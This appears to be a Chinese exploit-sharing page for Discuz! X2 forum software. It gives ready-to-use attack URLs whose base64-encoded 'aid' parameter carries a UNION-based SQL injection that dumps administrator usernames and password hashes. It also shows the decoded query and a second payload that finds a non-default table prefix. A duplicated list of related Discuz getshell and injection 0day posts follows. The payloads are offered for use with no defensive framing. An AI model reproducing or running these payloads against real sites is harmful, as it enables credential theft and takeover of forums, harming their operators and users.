程序版本: Discuz! X2
DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 21117, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16687, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14213, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 43270, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 49967, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23008, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15734, 评论: 0)
dz~~~~马后炮 (浏览: 10482, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11586, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18445, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16687, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14213, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 43270, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 49967, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23008, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15734, 评论: 0)
dz~~~~马后炮 (浏览: 10482, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11586, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18445, 评论: 0)
Trackbacks
 |
 |
 |
